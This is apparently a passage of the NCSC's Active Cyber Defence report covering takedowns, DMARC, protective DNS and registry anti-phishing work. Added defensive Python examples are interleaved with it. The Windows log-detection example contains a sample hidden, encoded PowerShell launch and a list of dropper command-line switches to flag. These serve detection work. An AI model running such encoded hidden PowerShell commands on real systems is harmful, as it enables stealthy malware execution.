11.1 Takedowns

The Takedown Service continues to provide protective benefit to brands related to the UK government but also shows that it is possible to dissuade criminals from using certain hosting by reducing their likely return on investment through proactive removal of malicious content. We believe we’ve shown that actively managing the HMG brands has significantly affected the abuse of those brands by criminals in attacks and that actively curating the UK’s delegated IP space (regardless of any brand abused or specific hosting provider) has a direct impact on the harm caused by malicious attacks. Scaling therefore falls into two strands of work:

1. Encouraging other owners of delegated IP space to actively curate their IP space to proactively discover and remove malicious content hosted within. If adopted widely, this could significantly reduce the amount of malicious content hosted globally and create real barriers to entry for cyber crime.

2. Encouraging owners of brands that have significant public trust (or are associated with monetary transactions) to actively engage brand protection of some form to reduce the ability of criminals to spoof those brands, improving the experience of the UK public in respect of those brands.

We are talking to our international government partners to try to get them to invest in curating their delegated IP space to reduce the prevalence of the hosting of malicious content in their jurisdictions. While those conversations are ongoing, we’re not seeing a lot of co-ordinated action being taken. We’ll continue those conversations, but perhaps pressure from citizens and businesses in those countries will help move things along. This will only work if there’s a concerted effort by a number of countries. Perhaps we’ll start publishing a rank table of where malicious stuff is hosted next year.

High trust and high impact brand protection is another issue entirely. In the end, many people will say that whether a brand chooses to do proactive brand protection is a purely commercial decision. We would, respectfully, disagree. For the vast majority of brand-related attacks, the brand itself sees little direct harm - it’s their customers who are defrauded or otherwise harmed. Even if the company that owns the brand sees no direct damage (through reduced customer trust or fraud claims, for example) we believe that a responsible approach would be to stop basic brand abuse in their name. The ‘point and laugh’ strategy of publishing league tables seems to work well in most cases and this is something we will investigate over the coming months in multiple areas.

There are, of course, high trust brands that are not high value enterprises, for example charities. We hope that we can aggregate demand and help others provide a highly cost effective service across those sectors, as we have done for the HMG brands. That work is likely to be ongoing for some time.

11.2 DMARC

Implementing DMARC properly consists of three steps:

1. Publishing the relevant policy records in DNS to tell the world how your mail system works and the policies you want implemented.

2. Processing the various reports you get from receivers of mail from your domain.

3. Scratching your head and wondering under what set of weird circumstances your mail delivery stuff could cause something this daft to happen.

The first of these is relatively simple provided you know something about how your mail infrastructure works. There are plenty of scripts and wizards out there to help a domain owner correctly construct their policy records to be published in their DNS.

The second takes some hard work. We’ve done a lot of that hard work building the services that perform these functions for the public sector. We’ve published our DMARC report processing platform as open source, here[33]. This is currently built to allow a single organisation to process and host reporting for multiple domains and organisations. It’s therefore not entirely trivial to set up if you’re a single organisation. That’s not to say it’s impossible, but it is harder than it needs to be for a single organisation looking to better protect their email brand. We hope to ease deployment for single organisations in due course. Regardless, this allows anyone to process DMARC reports for their domain with some work. We hope that this will help a little with wider adoption of DMARC and further reduce domain abuse by criminals.

The third part is hard. Really hard. It turns out if you have any sort of complexity in your mail infrastructure or use third parties to send mail on your behalf, actually implementing DMARC is a lot harder than people will have you think. There are plenty of people who’ll tell you they can get you fully protected using DMARC in a small number of months. It’s possible, but if you’ve got a real-world mail infrastructure that’s grown up over the years, section 3.9 will hold some salutary lessons. That’s not to say that you shouldn’t implement DMARC properly, just that you should take it slowly so you don’t bork anything important. Being able to process the reports is a critical part of that feedback loop, so make sure you implement something before winding up your ‘p=’ policy. Without some sort of report processing, you’ll never know if you disconnect the world from your outbound email[34].

We’re hoping to take some of the research alluded to in section 3.9 and turn it into production analytics. Whether we succeed or not, getting something running to store reports from receivers is important, even if you do nothing with them to start with.
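The three steps above, and the warning about winding up `p=` before you can read the reports, come down to two pieces of parsing and one question. The following is an added example, not the Mail Check platform or any other NCSC code: it reads a DMARC policy record, summarises a DMARC aggregate (rua) report per source IP, and then asks whether moving from `p=none` to an enforcing policy would cut off any of the domain owner's own senders. The record, the report XML and the set of known sender IPs are constructed samples (hypothetical domain and documentation-range addresses); the report layout follows the aggregate report schema in RFC 7489 Appendix C.

```python
"""Read a DMARC policy record and a DMARC aggregate (rua) report, then ask
whether tightening p= would cut off any of your own senders.

Added example, not the Mail Check platform. The record, the report and the
set of known sender IPs are constructed samples; the report layout follows
the aggregate report schema in RFC 7489 Appendix C.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict


def parse_dmarc_record(txt):
    """Split 'v=DMARC1; p=none; rua=...' into a tag dict with RFC defaults filled in.
    Raises ValueError if the record is not DMARC or lacks the mandatory p= tag."""
    tags = {}
    for item in txt.split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a DMARC record with a policy")
    tags.setdefault("sp", tags["p"])   # subdomain policy inherits p
    tags.setdefault("pct", "100")      # share of failing mail the policy applies to
    tags.setdefault("adkim", "r")      # relaxed alignment unless stated
    tags.setdefault("aspf", "r")
    return tags


def summarise_aggregate(xml_text):
    """Per source IP: messages seen, and how many passed or failed DMARC.
    A message passes if either the DKIM or the SPF result in policy_evaluated is 'pass'."""
    by_ip = defaultdict(lambda: {"messages": 0, "passed": 0, "failed": 0})
    for rec in ET.fromstring(xml_text).iter("record"):
        row = rec.find("row")
        ip = row.findtext("source_ip")
        count = int(row.findtext("count"))
        evaluated = row.find("policy_evaluated")
        passed = "pass" in (evaluated.findtext("dkim"), evaluated.findtext("spf"))
        by_ip[ip]["messages"] += count
        by_ip[ip]["passed" if passed else "failed"] += count
    return dict(by_ip)


def enforcement_risk(summary, known_sender_ips):
    """What would p=quarantine or p=reject do? Failing mail from a known sender is
    your own mail you would lose; failing mail from unknown sources is what the
    policy is meant to stop."""
    total = sum(s["messages"] for s in summary.values())
    own_at_risk = {ip: s["failed"] for ip, s in summary.items()
                   if ip in known_sender_ips and s["failed"]}
    unknown_failing = sum(s["failed"] for ip, s in summary.items()
                          if ip not in known_sender_ips)
    return {"total": total, "own_mail_at_risk": own_at_risk,
            "unknown_failing": unknown_failing,
            "safe_to_tighten": not own_at_risk}


# Constructed sample record and report (hypothetical domain and addresses).
SAMPLE_RECORD = "v=DMARC1; p=none; rua=mailto:dmarc-rua@example.org; ruf=mailto:dmarc-ruf@example.org"
SAMPLE_REPORT = """<feedback>
  <report_metadata>
    <org_name>receiver.example</org_name>
    <report_id>0001</report_id>
    <date_range><begin>1543622400</begin><end>1543708800</end></date_range>
  </report_metadata>
  <policy_published>
    <domain>example.org</domain><adkim>r</adkim><aspf>r</aspf><p>none</p><pct>100</pct>
  </policy_published>
  <record>
    <row><source_ip>198.51.100.10</source_ip><count>120</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.org</header_from></identifiers>
  </record>
  <record>
    <row><source_ip>198.51.100.20</source_ip><count>15</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.org</header_from></identifiers>
  </record>
  <record>
    <row><source_ip>203.0.113.5</source_ip><count>40</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.org</header_from></identifiers>
  </record>
</feedback>
"""
KNOWN_SENDER_IPS = {"198.51.100.10", "198.51.100.20"}  # e.g. own MX and a bulk-mail supplier

if __name__ == "__main__":
    print(parse_dmarc_record(SAMPLE_RECORD)["p"])
    print(enforcement_risk(summarise_aggregate(SAMPLE_REPORT), KNOWN_SENDER_IPS))
```

In the sample, the 15 failing messages from 198.51.100.20 are the third-party sender that was never set up for SPF or DKIM; with `p=reject` that is the mail you would silently lose, so `safe_to_tighten` is false until that sender is fixed, while the 40 failures from the unknown address are exactly what the policy exists to stop. Reports from many receivers should be merged before making the call, since any single receiver sees only its own slice of your traffic.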

One of the interesting things about DMARC is that whether an organisation implements it (and to what degree they trust that implementation) is effectively public information. It has to be, so that receivers can query a domain’s policy. Given there’s likely some correlation across the security spend that an organisation makes, DMARC adoption could be an interesting proxy measure for how much an organisation ‘cares’ about its customers. For example, a bank without a DMARC policy or with a published policy of p=none appears to be happy to have messages delivered in its name to anyone. That probably says something about how they think about security more generally, in terms of investment to protect their customers. So, it may be interesting to take a small number of security related characteristics that can be determined from public information, including use of DMARC, and use them to publish a league table of organisations in a particular sector. While we’d need to be careful about any inferences made from the data, collating and publishing it for a small number of industry sectors would likely be an interesting exercise. We’ll try to do this in 2019.

[33] https://github.com/ukncsc/mail-check

[34] We’re assuming that in the general case this would be a bad thing, but there are obviously exceptions.

11.3 Web Check

Web Check is our basic website vulnerability scanning service. None of the tests that it performs are completely unique - there are industry tools that do very similar things. However, with Web Check we’re in complete control of the scale and aggressiveness of the tests performed and can make guarantees to the users of the service about how their results will be used. Given some of the stuff we’ve found, that’s important in getting acceptance. Web Check is really about business change, rather than the testing per se, in that we need to engender the right culture and processes in the organisations that run these sites, reducing their fear of such services. Now we’ve shown that testing at scale can be done without breaking anything, we are looking to make Web Check more proactive and also seek to change the delivery model to allow for a much more scaled service outside the public sector. This is complex and there are many competing constraints and variables that we need to optimise. Keep an eye on the NCSC website for more details as we progress this. Obviously, we’ll report here next year as well.

11.4 DNS

Scaling protection using DNS blocking is not something we can do ourselves. It would be inappropriate for NCSC, a part of GCHQ, to run DNS services for anyone other than public sector organisations. However, the protective and harm reduction effects of careful DNS filtering for cyber security purposes have been proven in the public sector. Scaling this sort of effect outside of the public sector requires close partnerships with other entities who can provide a gearing function for us into another sector.

11.4.1 Academia

The vast majority of networking for Higher and Further Education establishments in the UK is provided by Jisc[35], who run the Janet Network which connects over 18 million education and research users. Jisc is in the process of introducing filtering for cyber security purposes on the Janet Network Resolver (i.e. the Janet-provided recursive DNS service). This will take a range of threat feeds and Jisc is actively building a sector-specific RPZ to take account of the unique nature of the academic networks in the UK. At the end of 2018, this service is not yet live, but we expect significant take up and protective effect when it is. We’ll obviously report here next year, but will also seek to work with Jisc to publish interesting data in the intervening period.
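A sector-specific RPZ of the kind described above is, mechanically, a DNS zone whose records tell the recursive resolver which names to refuse. The following is an added example of building one from a threat feed and is not Jisc's or the NCSC's tooling. It assumes the feed is a list of hostnames, that the sector maintains an allowlist of domains that must never be blocked whatever a feed says (the "unique nature" of academic networks made concrete), and it uses the standard RPZ convention of `CNAME .` for an NXDOMAIN answer plus a `*.` wildcard so subdomains are covered. Feed entries, the allowlist and the zone origin are constructed placeholders.

```python
"""Build a response policy zone (RPZ) from threat-feed domains, with a sector
allowlist so legitimate infrastructure is never blocked.

Added example, not Jisc's or the NCSC's RPZ tooling. Feed entries, allowlist
and origin are constructed placeholders. 'CNAME .' is the RPZ action that makes
the resolver answer NXDOMAIN for the name.
"""
import re

# One DNS label: 1-63 chars, letters/digits/hyphen, no leading or trailing hyphen.
LABEL_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def canonical(name):
    """Lowercase, strip a trailing dot, and reject anything that is not a valid
    hostname or that has a single label (which would block an entire TLD)."""
    name = name.strip().lower().rstrip(".")
    labels = name.split(".")
    if len(labels) < 2 or not all(LABEL_RE.match(lab) for lab in labels):
        return None
    return name


def is_under(name, parent):
    """True if name equals parent or sits anywhere beneath it."""
    return name == parent or name.endswith("." + parent)


def build_rpz(feed, allowlist, origin="rpz.example", serial=2018120100):
    """Return a dict with the zone text plus the lists of feed entries that were
    dropped and why: invalid, protected by the allowlist, or redundant because a
    parent domain (and its wildcard) already covers them."""
    result = {"invalid": [], "allowlisted": [], "redundant": [], "blocked": [], "zone": ""}
    blocked = set()
    for raw in feed:
        name = canonical(raw)
        if name is None:
            result["invalid"].append(raw)
        elif any(is_under(name, a) for a in allowlist):
            result["allowlisted"].append(name)
        else:
            blocked.add(name)
    final = sorted(n for n in blocked
                   if not any(p != n and is_under(n, p) for p in blocked))
    result["redundant"] = sorted(blocked - set(final))
    result["blocked"] = final
    lines = [f"$ORIGIN {origin}.", "$TTL 300",
             f"@ SOA ns.{origin}. hostmaster.{origin}. {serial} 3600 600 86400 300",
             f"@ NS ns.{origin}."]
    for n in final:
        lines.append(f"{n} CNAME .")      # NXDOMAIN for the name itself
        lines.append(f"*.{n} CNAME .")    # ...and for everything beneath it
    result["zone"] = "\n".join(lines) + "\n"
    return result


def rpz_answer(blocked_names, qname):
    """Simulate the resolver's check: is qname, or any parent of it, in the zone?"""
    qname = canonical(qname)
    if qname is None:
        return "pass"
    return "NXDOMAIN" if any(is_under(qname, b) for b in blocked_names) else "pass"


# Constructed sample feed and allowlist (placeholders, not real indicators).
SAMPLE_FEED = ["malware-c2.example.", "Phish.Example.net", "sub.malware-c2.example",
               "com", "legit-research.example", "bad_label.example"]
SAMPLE_ALLOWLIST = {"legit-research.example"}

if __name__ == "__main__":
    built = build_rpz(SAMPLE_FEED, SAMPLE_ALLOWLIST)
    print(built["zone"])
    print({k: v for k, v in built.items() if k != "zone"})
```

The allowlist check runs before anything is written, so a feed that lists a sector's own infrastructure (or a parent of it) cannot take it offline; the redundancy pass keeps the zone small, which matters when it is reloaded on every feed update. `rpz_answer` is only a model of the resolver's lookup for testing the zone content; the real resolver does this itself once the zone is loaded.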

11.4.2 Health

The health sector in the UK is a bit weird in terms of information and security governance and infrastructure and IT provision. In many cases, a GP surgery is its own master regarding its IT and security provision. There are standards enforced by the Department of Health, NHS Digital and the various governance bodies, but it is difficult to enforce centrally given such a disparate and diverse community. Nevertheless, we are in discussion with various bodies in the health sector to work out how best to deliver protective DNS-like services to the sector as a whole. This is unlikely to be delivered by allowing the health sector access to the current protective DNS infrastructure that protects the wider public sector, due to both privacy and scaling concerns. We hope to have more concrete progress to report in the next report.

[35] Before 2012, Jisc was known as the Joint Information Systems Committee, or JISC.

11.4.3 The public

The UK ISPs are the best gearing function for the protection of UK citizens. We have had some initial positive conversations with a number of ISPs and the community is now building. As detailed in the previous report, we asked BT to host a MISP[36] instance to allow telecoms operators and ISPs to share actionable intelligence between themselves. There are 28 ISPs connected to the MISP instance as of December 2018, with more connecting all the time. Interestingly, there are a number of international ISPs connected to the MISP instance today. The cost of connecting to the community MISP instance is sharing data. All the ISPs currently connected are actively sharing threat information (normally detections on their customer-facing networks) in a commercially neutral manner.

We are asking ISPs to protect their customers by default and for free, with customers being able to opt out of the protection. While not all ISPs are currently doing this, some are. BT are the only ISP to publish data around their consumer protection as of today, and so these are the only data we can provide in this report. However, more ISPs are providing this level of protection to their customers and we hope to be able to provide fuller data next year. In the interim, we provide the data for BT’s work. BT are automatically protecting all of their broadband connections, which totals around 6 million customers, the majority of whom are consumer broadband customers. The consumer DNS platform services around 2.6 million queries per second at peak, averaging approximately 130 billion queries per day. BT use a combination of commercial threat feeds, indicators shared by others (including the NCSC ‘secret sauce’) and their own research. They are currently concentrating on malware-related domains and block on average 110 million malicious connections per month. The peak for blocking occurred in October 2018, with 135 million malicious, malware-related connections blocked that month. More details of the BT platform performance can be found here[37].

We are also working with the World Economic Forum to see how we can promote a similar approach globally.

11.5 The UK ISPs

Last year, we reported that we had written to the ISP Association (ISPA), the trade body for the majority of UK internet service providers, to ask them to recommend the following set of measures to their members:

• Ensure that DMARC is processed properly and that their infrastructure does not break any of the prerequisite protocols, such as SPF and DKIM.

• Ensure that it is easy for their customers to properly deploy DMARC on their customer domains.

• Implement our SS7 filtering minimum standard and the current BGP suggestions and commit to working with us on future BGP enhancements.

[36] MISP is the Malware Information Sharing Platform, available at https://misp-project.org

[37] https://www.btplc.com/Digitalimpactandsustainability/Buildingbetterdigitallives/cyberindex/index.htm

• Properly filter management protocols (for example TR-069 and SNMP) and other potentially dangerous protocols (for example telnet and UPnP) from the internet to residential broadband by default (with an opt out for users)

• By default, protect their users from known cyber attacks (with an opt out for users). We are not specifying how this should be done or what threat feeds are used, but offer ours either directly or through a community MISP platform.

We received a positive response from ISPA in early 2018 and have been working to turn this into tangible action, but more concerted effort is needed here.

11.6 The UK Registry

Nominet, the UK Registry, has two programmes to help make the .UK namespace more trusted. Each is designed to proactively stop malicious domains in the .UK namespace causing harm.

11.6.1 Domain Health

Domain Health is a free initiative created to alert registrars of names in .UK of domains they administer which are implicated in spam, phishing, malware and botnet activity and to provide them with practical advice as to what they can do to address these problems. Threat intelligence is collected from various open source and commercial sources and then reports are collated and delivered via email or an API to the relevant registrars. A ranking and scoring system is used to inform registrars how they perform in relation to other registrars.

During the month of December 2017 there were 133,845 domains linked to active reports in the .UK registry out of a total number of 12,040,322 domains. This equates to around 111 per 10,000 domains. 75% of the reports relate to phishing, 8% to spam and 17% to malware.

During the month of December 2018 there were 145,595 active reports in the .UK registry out of a total number of 11,999,151 domains. This equates to around 121 per 10,000 domains. 44% of the reports relate to phishing, 46% to spam and 10% to malware.

This shows a relatively constant rate of abuse in the .UK namespace over the year, but a significant shift in the character of the malicious domains. As far as we know, no other registry does similar proactive work to curate the health of their namespace, so we do not have a comparator to show whether the level of abuse in the UK namespace is above or below average. While it would be nice to assert that the level of phishing and malware abuse in the .UK namespace has dropped because of our other work, we do not have the data to show that conclusively at the moment.

11.6.2 Domain Watch

Domain Watch is an anti-phishing initiative to further increase the security of the .UK zone and protect .UK end users from malicious phishing activity. The aim of Domain Watch is to quickly identify and suspend newly registered domains that are obvious phishing attempts. Domains are analysed using a proprietary algorithm, and high risk registrations are then manually checked to ensure that legitimate registrations are not impacted.
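Nominet's algorithm is proprietary and the page does not describe it, so the following is an added example of the generic first-pass scoring a registry or registrar might run over new registrations to decide which ones a human should look at; it is not Nominet's code and makes no claim about how Domain Watch actually works. It assumes a list of protected brand labels, a small list of credential-lure words and a list of public suffixes, all constructed here; the three features it scores (a brand name embedded alongside extra words, digit-for-letter substitution, and a small edit distance from a brand) are the commonly used ones, and the review threshold is illustrative. The manual-check step described above is what keeps false positives from affecting legitimate registrations.

```python
"""Score newly registered domain names for resemblance to protected brands.

Added example, not Nominet's Domain Watch algorithm. The brand list, the
lure-word list, the public-suffix list and the sample registrations are all
constructed; the threshold is illustrative.
"""

BRANDS = {"examplebank", "exampletax"}  # constructed protected brand labels
LURE_WORDS = {"login", "secure", "verify", "update", "account", "support", "refund"}
PUBLIC_SUFFIXES = ("co.uk", "org.uk", "me.uk", "ltd.uk", "uk")  # constructed subset, longest first
# Digits commonly substituted for the letters they resemble.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def registrable_label(domain):
    """'examp1ebank.co.uk' -> 'examp1ebank': the label the registrant chose."""
    domain = domain.lower().rstrip(".")
    for suffix in PUBLIC_SUFFIXES:
        if domain.endswith("." + suffix):
            return domain[: -len(suffix) - 1].split(".")[-1]
    return domain.split(".")[0]


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute each cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def score_domain(domain):
    """Return (score, reasons). Higher means more likely to be a brand lookalike."""
    label = registrable_label(domain)
    folded = label.translate(CONFUSABLES).replace("-", "")  # undo common disguises
    score, reasons = 0, []
    for brand in BRANDS:
        if folded == brand:
            if label != brand:  # only matches the brand once digits/hyphens are undone
                score += 4
                reasons.append(f"confusable spelling of {brand}")
            break  # an exact brand label is the brand's own registration: nothing to flag
        if brand in folded:
            score += 3
            reasons.append(f"contains {brand}")
            extra = folded.replace(brand, "")
            if any(word in extra for word in LURE_WORDS):
                score += 2
                reasons.append("with a credential-lure word")
        elif levenshtein(folded, brand) <= 2:
            score += 3
            reasons.append(f"within 2 edits of {brand}")
    return score, reasons


def triage(domains, threshold=3):
    """Map each domain to ('review' | 'ok', score, reasons)."""
    out = {}
    for d in domains:
        score, reasons = score_domain(d)
        out[d] = ("review" if score >= threshold else "ok", score, reasons)
    return out


# Constructed sample registrations (hypothetical names).
SAMPLE_REGISTRATIONS = ["examplebank-login.co.uk", "examp1ebank.uk", "exmaplebank.co.uk",
                        "examplebank.co.uk", "bookshop.co.uk", "exampletax-refund.org.uk"]

if __name__ == "__main__":
    for name, outcome in triage(SAMPLE_REGISTRATIONS).items():
        print(name, outcome)
```

Only the names that cross the threshold go to a person, which is the same shape as the pilot above: an automated filter narrows the stream, and the manual check decides. Scoring on the registrable label rather than the whole name avoids penalising legitimate subdomains, and the fold-then-compare approach catches `examp1ebank` without a separate rule for every digit.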

Since the launch of the pilot in July 2018, Nominet have suspended 434 phishing domains. Of these domains, 124 were targeting the public sector including local authorities, HMRC, NHS, and police. 145 domains were targeting private sector organisations such as Amazon, Google, Apple, and Microsoft. Financial institutions are heavily targeted as part of phishing campaigns and 143 domains were suspended targeting banking organisations including HSBC, Barclays, Santander, Metrobank, and Lloyds Bank. Domain Watch also incorporates an appeal process for holders of suspended domains to appeal the decision by providing evidence of legitimate use.

11.6.3 Tackling criminal activity

Nominet collaborate with ten organisations that send reports of criminal usage of domains, mainly relating to fraud. The latest criminality report (available here[38]) shows that the number of .UK domains suspended between 1 November 2017 and 31 October 2018 has again doubled year on year to 32,813. This is an increase on the 16,632 suspensions over the preceding 12-month period and represents around 0.27% of the more than 12 million .UK domains currently registered. This proactive work complements the takedown service run for the NCSC.

11.7 Critical National Infrastructure

One of the hardest jobs of any national cyber security centre is to help operators of critical infrastructure better secure their systems. This is partly because of the unique nature of some of the operational systems concerned, and partly because operators of these services need to be very careful when changing systems as any failures potentially impact the citizens of the UK in their everyday lives. It follows that cyber security services that are useful in enterprise and citizen-facing environments may have a different effect in the critical national infrastructure operational technology domain. So, we are looking at how the current ACD services could be useful in helping critical national infrastructure operators better protect their organisations and operational systems. We intend to try some experiments during 2019 to see what impact these services can have in the CNI.

[38] https://www.nominet.uk/32000-uk-domains-suspended-as-law-enforcement-and-industry-keep-uk-safe/

12 Future work

We have a pipeline of interesting ideas that we want to test out to see if they provide real world benefit. Here we present a small number of early stage ideas that we’re looking to build in the next year. These may or may not work, and may or may not provide the benefit we want, but each will be judged in an evidence-based way and reported on here in due course.

12.1 Exercise in a Box

One of the things we’ve learned since the NCSC was created is that many organisations don’t rehearse their incident management plan. In fact, many don’t have an incident management plan at all. Exercising is a well understood way of practising incident management to refine an organisation’s playbook. Knowing how to respond is critical - innovating during an incident is generally a bad idea.

Exercise in a Box is intended to be a unique online cyber exercising tool to enable organisations to understand their preparedness in managing and responding to cyber attacks. The tool provides exercises based on common cyber threats which organisations can practise as many times as they want. It brings together everything an organisation needs for setup, planning, delivery and post-exercise activity, all in one place. Organisations sign on, set their profile, pick their exercise (either a discussion or a technical simulator), download the materials, and then complete it in their own time, in a safe environment. There is a help facility should an organisation need it, but the tool is designed to be a self-help product and you don’t need to be an expert to use it. It is also free to use.

The exercises in the first iteration are designed for small and medium enterprises, local government and similar organisations, but other organisations could benefit from using it, depending on their exercising needs. Exercise in a Box has been developed as a stepping stone to the more advanced tools on the market.

The tool also links to relevant NCSC advice and guidance and it will continue to evolve as we get user feedback. Given our understanding of the user need, we expect Exercise in a Box to get significant usage once formally launched in early 2019[39].

12.2 Logging Made Easy

Everyone knows that the logging and audit of a network is important to be able to spot attacks and to help investigate incidents. During incidents, the typical questions asked include:

• What has happened?

• What is the impact?

• What should we do next?

• Has any post-incident remediation been effective?

• Are our security controls working?

Being able to answer even some of these questions will help you both detect a problem and recover from any subsequent harm more quickly. We went into more detail in a blog post here[40]. This explains that logging isn’t a trivial exercise as system owners need to decide what to log, where to store it, how to analyse it and so on. For small organisations, answering these questions and working out how to actually implement the associated technology may consume a significant amount of their IT budget.

[39] Exercise in a Box is actually a live service at the time of writing. It’s available at https://www.ncsc.gov.uk/information/exercise-in-a-box.

[40] https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes

So, we are working with Cabinet Office Government Security Group and our partners in NCC Group to try to create a basic logging and analysis solution that is easy to understand, deploy and use in most small networks. It's called Logging Made Easy and, importantly, it will be free.

Lots of open source and free software, tools and guidance are already available and our intent is to point to and reuse as much of this as possible. We hope our initial alpha release will help system owners monitor their Windows networks for cyber security issues and help them mitigate any incidents they encounter. We expect the alpha release in early 2019[41].
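To illustrate the "how to analyse it" part of the logging problem, the following Python is an added example written for this page; it is not Logging Made Easy or NCSC code, and the page does not describe what the alpha actually collects or how it stores it. It runs two simple detections over a handful of constructed Windows Security events: a burst of failed logons (event 4625) followed by a success (4624) from the same source and account, and a process creation (4688) whose command line carries the usual hidden, encoded PowerShell switches. The flattened field names (ts, id, host, user, src, cmd) are a simplifying assumption; real events carry these inside EventData under longer names.

```python
"""Two simple detections over Windows Security events.
Added example for this page, not NCSC or Logging Made Easy code. The events
below are constructed and the flattened field names are an assumption."""
import json
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(ts, eid, host, user, src="", cmd=""):
    return {"ts": ts, "id": eid, "host": host, "user": user, "src": src, "cmd": cmd}


# Constructed sample: six failed logons for one account from one workstation
# within a minute, then a success from the same source, two stray failures
# from elsewhere, and two process creations, one an encoded PowerShell launch.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    _ev("2019-03-04T09:00:00Z", 4625, "FS01", "jsmith", "10.0.0.23"),
    _ev("2019-03-04T09:00:10Z", 4625, "FS01", "jsmith", "10.0.0.23"),
    _ev("2019-03-04T09:00:20Z", 4625, "FS01", "jsmith", "10.0.0.23"),
    _ev("2019-03-04T09:00:30Z", 4625, "FS01", "jsmith", "10.0.0.23"),
    _ev("2019-03-04T09:00:40Z", 4625, "FS01", "jsmith", "10.0.0.23"),
    _ev("2019-03-04T09:00:50Z", 4625, "FS01", "jsmith", "10.0.0.23"),
    _ev("2019-03-04T09:01:05Z", 4624, "FS01", "jsmith", "10.0.0.23"),
    _ev("2019-03-04T09:02:00Z", 4625, "FS01", "admin", "10.0.0.40"),
    _ev("2019-03-04T09:03:00Z", 4625, "FS01", "admin", "10.0.0.40"),
    _ev("2019-03-04T09:01:30Z", 4688, "FS01", "jsmith", "",
        "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    _ev("2019-03-04T09:05:00Z", 4688, "WS07", "aahmed", "", "notepad.exe C:\\notes.txt"),
])


def parse_events(text):
    """Parse JSON lines into dicts with a real datetime, oldest first."""
    events = []
    for line in text.splitlines():
        if line.strip():
            e = json.loads(line)
            e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Flag (source, account) pairs with at least `threshold` failed logons
    (4625) inside `window`. A success (4624) from the same source after the
    burst is the case that needs a human straight away, so it is recorded."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        key = (e["src"], e["user"])
        if e["id"] == 4625:
            failures[key].append(e["ts"])
        elif e["id"] == 4624:
            successes[key].append(e["ts"])
    alerts = []
    for key, times in failures.items():
        for i in range(len(times)):                      # sliding window over sorted times
            j = i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            if j - i >= threshold:
                last = times[j - 1]
                alerts.append({"src": key[0], "user": key[1], "failures": j - i,
                               "first": times[i], "last": last,
                               "success_after": any(t > last for t in successes[key])})
                break
    return alerts


# Switches that are rare in legitimate admin use and common in malware droppers.
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "-nop", "-w hidden", "downloadstring")


def detect_suspicious_process(events):
    """Flag 4688 process-creation events whose command line matches SUSPICIOUS_ARGS."""
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        cmd = e["cmd"].lower()
        matched = [a for a in SUSPICIOUS_ARGS if a in cmd]
        if matched:
            hits.append({"host": e["host"], "user": e["user"], "cmd": e["cmd"], "matched": matched})
    return hits


def triage(text):
    """Run both detections over a block of JSON-lines events."""
    events = parse_events(text)
    return {"bruteforce": detect_bruteforce(events),
            "processes": detect_suspicious_process(events)}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2, default=str))
```

The two stray failures for "admin" stay below the threshold and produce nothing, which is the point of windowing on (source, account) rather than counting 4625s globally: a noisy network would otherwise page constantly. Process-creation events only carry a command line if command-line auditing is enabled in audit policy, which is one of the "what to log" decisions the text refers to.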

12.3 Internet Weather Centre

We publish guidance and give advice to help various entities, from huge enterprises through small businesses to the individual citizen, with their cyber security. We're often asked for advice on specific software or infrastructure and whether it's secure enough for a particular use or how to configure it. This need drives a decent amount of our advice and guidance production. In order to publish anything, we need to research the product or service and really understand the security implications of it. In order to be the most relevant we can be, we need to prioritise research on products and services that people use, rather than ones that are just academically interesting for us. As a side effect of understanding the most popular products and services, we start to understand the digital makeup of the UK. That should help us better understand the effect of specific vulnerabilities or exploits on the whole of the UK, but also reason about our national dependence on specific suppliers. This is measuring things, rather than guessing or using very variable surveys to infer things.

The Internet Weather Centre aims to draw on multiple data sources to allow us to really understand the digital landscape of the UK. We've already run a number of research experiments which aim to answer questions like 'What are the most commonly used cloud services?' But we want to answer much more generic questions, along the lines of

• Which are the most popular providers in this technology class? (e.g. authoritative DNS, content delivery networks, IaaS, instant messaging)

• What is the adoption of a particular security control in the UK? (e.g. DMARC, Certificate Authority Authorization)

• What insecure infrastructure can we see exposed to the internet and to whom does it belong?

As well as getting an overview of what the UK looks like, we can also spot trends and act accordingly. For example, if we see that a particular SaaS is becoming popular, we can dedicate research into understanding how secure it is straight out of the box, and how best to configure it to meet our security standards. We can then release this as guidance to help those adopting it do so securely, also working directly with the provider if necessary to help them make any security uplifts necessary.

In 2019, the Internet Weather Centre is lined up to be built into a prototype, taking in multiple sources of detail and built to meet the ACD principles - automated, scalable, and measurable.

[41] Logging Made Easy is actually released as an alpha at the time of writing. It's available from https://www.ncsc.gov.uk/blog-post/logging-made-easy.



12.4 Infrastructure Check

